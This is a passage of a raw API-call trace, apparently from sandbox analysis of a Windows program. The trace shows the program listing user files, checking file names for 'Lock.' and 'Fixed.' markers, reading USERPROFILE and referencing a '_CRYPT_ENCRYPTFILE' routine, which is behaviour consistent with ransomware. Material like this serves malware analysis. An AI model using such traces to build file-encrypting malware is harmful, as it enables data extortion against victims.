lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.055] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.055] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.055] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.055] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.055] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1562a0, ftCreationTime.dwHighDateTime=0x1d5e804, ftLastAccessTime.dwLowDateTime=0x9f6e0960, ftLastAccessTime.dwHighDateTime=0x1d5e864, ftLastWriteTime.dwLowDateTime=0x9f6e0960, ftLastWriteTime.dwHighDateTime=0x1d5e864, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PQL6bR58of", cAlternateFileName="PQL6BR~1")) returned 1 [0257.055] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.055] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.055] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.055] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.055] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4974c0, ftCreationTime.dwHighDateTime=0x1d5e88c, ftLastAccessTime.dwLowDateTime=0x8b491040, ftLastAccessTime.dwHighDateTime=0x1d5ea8c, ftLastWriteTime.dwLowDateTime=0x8b491040, ftLastWriteTime.dwHighDateTime=0x1d5ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x2bd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="XujfB_EFQdQYTzBm8.flv", cAlternateFileName="XUJFB_~1.FLV")) returned 1 [0257.056] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.056] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.056] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.056] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.056] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.056] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="踚@锴\x97\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0257.056] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.056] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.056] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0257.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0257.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0257.057] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.057] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.057] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.058] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.058] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0FMiSmnvsI1v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FMiSmnvsI1v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MiSmnvsI1v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iSmnvsI1v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SmnvsI1v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mnvsI1v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nvsI1v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vsI1v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sI1v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I1v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0257.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0257.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0257.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0257.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0257.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0257.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0257.059] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0FMiSmnvsI1v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FMiSmnvsI1v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MiSmnvsI1v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iSmnvsI1v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SmnvsI1v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mnvsI1v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nvsI1v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vsI1v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sI1v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I1v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8s.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0257.059] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.059] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0257.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0257.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d28 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0257.060] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0257.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0257.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0257.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0257.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0257.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0257.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0257.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0257.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d98 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0257.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0257.061] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x9787d0 [0257.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0257.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0257.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0257.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0257.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0257.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0257.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0257.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e98 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0257.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0257.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0257.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0257.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0257.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0257.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0257.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0257.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0257.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0257.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0257.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0257.063] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0257.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0257.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0257.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0257.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0257.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0257.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0257.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0257.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0257.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.065] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0257.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0257.065] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0257.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0257.065] FindFirstFileW (in: 